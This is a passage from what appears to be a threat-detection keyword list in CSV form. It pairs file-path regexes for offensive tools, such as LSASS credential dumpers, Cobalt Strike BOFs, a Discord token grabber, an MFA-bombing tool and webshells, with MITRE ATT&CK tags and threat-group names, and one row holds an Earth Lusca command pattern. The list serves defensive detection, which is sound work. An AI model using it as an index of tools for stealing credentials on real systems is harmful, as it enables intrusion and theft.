"*/looneypwner.sh*",".{0,1000}\/looneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","8630"
"*/loot_default/*.exe*",".{0,1000}\/loot_default\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","8631"
"*/loot_default/*.ps1*",".{0,1000}\/loot_default\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","8632"
"*/loot_default/*.py*",".{0,1000}\/loot_default\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","8633"
"*/loot_finder*",".{0,1000}\/loot_finder.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8634"
"*/lpBunny/bof-registry*",".{0,1000}\/lpBunny\/bof\-registry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","8635"
"*/LPE_Reflect_Elevate.x64.dll*",".{0,1000}\/LPE_Reflect_Elevate\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8636"
"*/lsa_dump_*.txt*",".{0,1000}\/lsa_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8637"
"*/lsadump.py*",".{0,1000}\/lsadump\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","8638"
"*/lsarelayx.git*",".{0,1000}\/lsarelayx\.git.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","8639"
"*/lsasecrets.py*",".{0,1000}\/lsasecrets\.py.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","1","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","8640"
"*/lsass.DMP*",".{0,1000}\/lsass\.DMP.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","8641"
"*/lsass.rar*",".{0,1000}\/lsass\.rar.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","8642"
"*/lsass.zip*",".{0,1000}\/lsass\.zip.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","8643"
"*/lsass/beacon.h*",".{0,1000}\/lsass\/beacon\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","8644"
"*/Lsass_Shtinkering.cpp*",".{0,1000}\/Lsass_Shtinkering\.cpp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","8645"
"*/Lsass_Shtinkering.exe*",".{0,1000}\/Lsass_Shtinkering\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","8646"
"*/lsass64.exe*",".{0,1000}\/lsass64\.exe.{0,1000}","offensive_tool_keyword","lslsass","dump active logon session password hashes from the lsass process (old tool for vista and older)","T1003.001","TA0006","N/A","APT1","Credential Access","https://www.virustotal.com/gui/file/b24ab1f8cb68547932dd8a5c81e9b2133763a7ddf48aa431456530c1340b939e/details","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","8647"
"*/LSASSProtectionBypass/CredGuard.c*",".{0,1000}\/LSASSProtectionBypass\/CredGuard\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","8648"
"*/LsassReflectDumping.git*",".{0,1000}\/LsassReflectDumping\.git.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","1","N/A","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","8649"
"*/Lsass-Shtinkering.git*",".{0,1000}\/Lsass\-Shtinkering\.git.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","8650"
"*/LsassSilentProcessExit.git*",".{0,1000}\/LsassSilentProcessExit\.git.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","8651"
"*/Lsassx.git*",".{0,1000}\/Lsassx\.git.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","1","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","8652"
"*/Lsassx.ps1*",".{0,1000}\/Lsassx\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","1","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","8653"
"*/Lsassx-OBF.ps1*",".{0,1000}\/Lsassx\-OBF\.ps1.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","1","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","8654"
"*/lsassy*",".{0,1000}\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","8655"
"*/lsassy/releases/download/*",".{0,1000}\/lsassy\/releases\/download\/.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","8656"
"*/lsassy_dump.py*",".{0,1000}\/lsassy_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8657"
"*/lucksec/CVE-2022-0847*",".{0,1000}\/lucksec\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/lucksec/CVE-2022-0847","1","1","N/A","N/A","N/A","1","1","3","2022-03-08T01:50:39Z","2022-03-08T01:17:09Z","8661"
"*/lu-enum.nse*",".{0,1000}\/lu\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8662"
"*/luijait/arpspoofing*",".{0,1000}\/luijait\/arpspoofing.{0,1000}","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/luijait/arpspoofing","1","1","N/A","network exploitation tool","N/A","1","21","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z","8663"
"*/luna.log*",".{0,1000}\/luna\.log.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#linux","N/A","10","","N/A","","","","8664"
"*/Luna-Grabber.git*",".{0,1000}\/Luna\-Grabber\.git.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8665"
"*/Luna-Grabber/releases/download/*",".{0,1000}\/Luna\-Grabber\/releases\/download\/.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8666"
"*/Luna-Grabber/tarball/*",".{0,1000}\/Luna\-Grabber\/tarball\/.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8667"
"*/Luna-Grabber/zipball*",".{0,1000}\/Luna\-Grabber\/zipball.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8668"
"*/Luna-Grabber-Injection/main*",".{0,1000}\/Luna\-Grabber\-Injection\/main.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","1","N/A","N/A","10","","N/A","","","","8669"
"*/ly4k/Pachine*",".{0,1000}\/ly4k\/Pachine.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","Black Basta","Privilege Escalation","https://github.com/ly4k/Pachine","1","1","N/A","N/A","8","3","275","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z","8670"
"*/lyncsmash/*",".{0,1000}\/lyncsmash\/.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","8671"
"*/LyncSniper.ps1*",".{0,1000}\/LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","8672"
"*/m *.lnk* /c *cmd /c echo f|xcopy @file %temp%*",".{0,1000}\/m\s.{0,1000}\.lnk.{0,1000}\s\/c\s.{0,1000}cmd\s\/c\secho\sf\|xcopy\s\@file\s\%temp\%.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8673"
"*/m365-fatigue.git*",".{0,1000}\/m365\-fatigue\.git.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","1","N/A","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","8674"
"*/m365-fatigue.py*",".{0,1000}\/m365\-fatigue\.py.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","1","N/A","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","8675"
"*/m3-gen.py *",".{0,1000}\/m3\-gen\.py\s.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","#linux","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","8676"
"*/MAAD-AF.git*",".{0,1000}\/MAAD\-AF\.git.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","8677"
"*/MaccaroniC2*",".{0,1000}\/MaccaroniC2.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","8678"
"*/MaceTrap.exe*",".{0,1000}\/MaceTrap\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","8679"
"*/machine_role.py*",".{0,1000}\/machine_role\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8680"
"*/Macker's Private PHPShell.php*",".{0,1000}\/Macker\'s\sPrivate\sPHPShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8681"
"*/macro_pack.exe*",".{0,1000}\/macro_pack\.exe.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8682"
"*/macro_pack.git*",".{0,1000}\/macro_pack\.git.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8683"
"*/macro_pack.py",".{0,1000}\/macro_pack\.py","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8684"
"*/macro_pack/releases/download/*",".{0,1000}\/macro_pack\/releases\/download\/.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8685"
